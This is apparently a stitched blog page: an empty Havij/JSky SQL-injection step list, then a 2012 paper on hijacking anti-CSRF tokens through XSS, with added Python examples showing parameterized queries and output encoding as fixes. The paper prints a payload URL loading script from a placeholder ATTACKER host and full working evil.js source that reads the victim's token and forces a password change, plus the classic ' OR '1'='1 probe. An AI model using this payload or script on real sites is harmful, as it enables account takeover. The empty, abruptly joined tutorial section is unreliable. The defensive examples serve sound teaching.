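Tools like Havij only automate what the first paragraph describes: input that is concatenated into a SQL string becomes part of the query's grammar. The following is an added example, not code from the original post, that puts the vulnerable lookup beside its parameterized fix against an in-memory SQLite table with constructed rows; the same principle holds for the SQL Server case the paragraph refers to. The probe string is the classic tautology such tools begin with, and the example shows it returning every row from the concatenated query and nothing from the bound one.

```python
"""The flaw Havij automates (string-built SQL) beside its fix (parameterized queries).

Added example, not from the original post. In-memory SQLite with constructed rows.
"""
import sqlite3

def make_db():
    """Constructed users table: three rows, one of them privileged."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    con.executemany("INSERT INTO users (username, role) VALUES (?, ?)",
                    [("alice", "user"), ("bob", "user"), ("admin", "administrator")])
    return con

def lookup_vulnerable(con, username):
    """String concatenation: the caller's input is parsed as SQL along with the query."""
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return con.execute(sql).fetchall()

def lookup_parameterized(con, username):
    """Placeholder binding: the driver sends the input as a value, never as SQL text."""
    return con.execute("SELECT username, role FROM users WHERE username = ?",
                       (username,)).fetchall()

def demo():
    """Same probe against both lookups, plus a legitimate lookup to show nothing broke."""
    con = make_db()
    probe = "' OR '1'='1"   # turns WHERE username = '' into WHERE username = '' OR '1'='1'
    return {
        "vulnerable": lookup_vulnerable(con, probe),
        "parameterized": lookup_parameterized(con, probe),
        "legit": lookup_parameterized(con, "alice"),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:13s}: {rows}")
```

Reviewing code for this is mechanical: any query built with +, f-strings or format() from request data is a finding, regardless of how the input is "cleaned" first, because escaping rules differ per database and per data type while a bound parameter is never parsed at all.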

1. JSky software
2. Havij software

Step 1--> Find out the SQLi vulnerability in the website using the JSky software

Step 2-->

Step 3-->

Step 4-->

Step 5-->


game is over  

Monday, 7 May 2012

Token Hijacking with XSS

Firstly, thanks to everyone who reads this paper. I chose "Token Hijacking with XSS" as the title of this paper, and I will try to describe how we can exploit web applications which are secured with anti-CSRF tokens.
After preparing the PoC and paper I saw some discovered worms, and these worms exploit social platforms like Facebook, Twitter etc. (no, I am not the author of these worms :> ). I can say that these worms use the same idea. For example, when you reverse the latest Facebook worm you can see it hijacks the user's session token with JavaScript tricks (tricks so like return-oriented programming, because it uses some of Facebook's own JS libraries.. :> ) and uses the hijacked session token for liking groups, updating status and giving permissions to applications. So I can give the Facebook and Twitter worms as a real-world example.
As I mentioned, we do all of these stages with a Cross-Site Request Forgery attack, but the hijacking code in JavaScript is the important part of our attack. As is known, people release XSS vulnerabilities, but if you think XSS is only "alert('XSS')", I can say you fail. Why? Because no weakness should be underestimated. Do you remember Apache was hacked through JIRA's XSS vulnerability?
Sometimes, if the application doesn't store any useful data on the client side, a found XSS vulnerability can seem useless. But it can be used to force the application into a CSRF.
For this paper, I coded a simple vulnerable application (it's so simple!!). This application has 3 files. The file named "xssable.php" has the XSS vulnerability. Another file named "form.php" gives the user a form for changing the password; this file creates the session token and sends it to "passwd.php" with the credentials. The last file, named "passwd.php", checks the sent credentials and session token. Here is the source code of each file.

<?php
// xssable.php: the "user" parameter is echoed back without any output encoding (the XSS)
$user = stripslashes($_GET["user"]);
echo "Hello dear $user";
?>

<?php
// form.php: creates the anti-CSRF token, stores it in the session and embeds it in the form
session_start();
$token = md5(microtime().rand(1337, 31337));
$_SESSION["anti-csrf-token"] = $token;
$username = "admin";
$password = "123456";
?>
<form id="change_password" action="passwd.php" method="POST">
<input type="hidden" name="token" value="<?php echo $token; ?>">
Username: <input type="text" name="uname" value="<?php echo $username; ?>"><br>
Password: <input type="password" name="pwd" value="<?php echo $password; ?>"><br>
<input type="submit" name="change" value="Change">
</form>



<?php
// passwd.php: accepts the change only when the posted token matches the one in the session
session_start();
$token = $_SESSION["anti-csrf-token"];
$form_token = $_POST["token"];
if ($token == $form_token) {
echo "Your password changed..<br>";
} else {
echo "CSRF Attack Detected!!!";
}
?>


Now I exploit the classic XSS vulnerability, execute my "evil.js" and force the user to change his password. Our payload is like this:
http://VICTIM/xssable.php?user=<script src=http://ATTACKER/evil.js ></script>

As you see, evil.js requests form.php with XMLHttpRequest (the get_src function in evil.js's source code) and hijacks the session token with a regular expression (the get_token function).

Lastly, passwd.php accepts the request because it arrives with a valid session token.

Source code of evil.js below:

/* evil.js: fetch form.php in the victim's session, read the anti-CSRF token out of the
   response, then POST the password change to passwd.php carrying that token. */
function get_src() {
    var ajax;
    if (window.XMLHttpRequest) {
        ajax = new XMLHttpRequest();
    } else {
        ajax = new ActiveXObject("Microsoft.XMLHTTP");
    }
    ajax.onreadystatechange = function () { get_token(ajax); };
    ajax.open("GET", "form.php", true);
    ajax.send(null);
}

function get_token(a) {
    if (a.readyState == 4 && a.status == 200) {
        var src = a.responseText;
        var p = /value="([0-9a-f]+)"/;   // the hidden token field is the only hex-valued input
        var token = src.match(p);
        var params = "token=" + token[1] + "&uname=OWNED&pwd=PWNED";
        attack(params);
    }
}

function attack(parameters) {
    var http_request;
    if (window.XMLHttpRequest) {
        http_request = new XMLHttpRequest();
    } else {
        http_request = new ActiveXObject("Microsoft.XMLHTTP");
    }
    http_request.onreadystatechange = function () {
        if (http_request.readyState == 4 && http_request.status == 200) {
            alert("YOU GOT PWNED!!!!\n\n" + http_request.responseText);
        }
    };
    http_request.open('POST', "passwd.php", true);
    http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    http_request.setRequestHeader("Content-length", parameters.length);
    http_request.setRequestHeader("Connection", "close");
    http_request.send(parameters);
}

get_src();
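The paper's lesson is that a token check cannot defend a page that lets attacker script run in the victim's origin, because that script can read the form exactly as evil.js does; the fix belongs at the XSS, i.e. at the unencoded echo in xssable.php. The following is an added example, not from the paper (which is in PHP), written in Python with the standard library only: it reproduces the vulnerable greeting beside an HTML-encoded one and checks what the paper's payload turns into under each, and it shows a token comparison that is constant-time and refuses a missing token, since passwd.php's `$token == $form_token` also passes when both sides are unset. ATTACKER in the payload is the paper's own placeholder.

```python
"""Closing the hole evil.js walks through: encode untrusted output, compare tokens safely.

Added example, not from the paper. Standard library only; PAYLOAD is the paper's
payload with its ATTACKER placeholder kept.
"""
import hmac
import html
import re
import secrets

PAYLOAD = '<script src=http://ATTACKER/evil.js ></script>'

def greet_vulnerable(user):
    """Mirror of xssable.php: the parameter lands in the markup untouched."""
    return f"Hello dear {user}"

def greet_hardened(user):
    """Same greeting with HTML entity encoding; the payload is now inert text."""
    return f"Hello dear {html.escape(user, quote=True)}"

def contains_script_tag(rendered):
    """Does the rendered markup contain an element a browser would execute?"""
    return re.search(r"<script\b", rendered, re.I) is not None

def new_token():
    """128 bits from the OS CSPRNG, stored server-side in the session (replaces md5(microtime()))."""
    return secrets.token_hex(16)

def verify_token(session_token, form_token):
    """Constant-time comparison that treats a missing token on either side as a failure."""
    if not session_token or not form_token:
        return False
    return hmac.compare_digest(session_token, form_token)

def demo():
    token = new_token()
    return {
        "vulnerable_executes": contains_script_tag(greet_vulnerable(PAYLOAD)),
        "hardened_executes": contains_script_tag(greet_hardened(PAYLOAD)),
        "valid_token": verify_token(token, token),
        "wrong_token": verify_token(token, "0" * 32),
        "missing_token": verify_token(None, None),
    }

if __name__ == "__main__":
    print(greet_hardened(PAYLOAD))
    for check, result in demo().items():
        print(f"{check:20s} {result}")
```

Encoding at the output point is what removes the script; the stronger token and the strict comparison are still worth having, but on their own they would not have stopped evil.js, which is precisely the paper's point.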


I finish this paper with a nice quote from CGI Security's well-known XSS FAQ article: "Never trust user input".

DEMO of Token Hijacking with XSS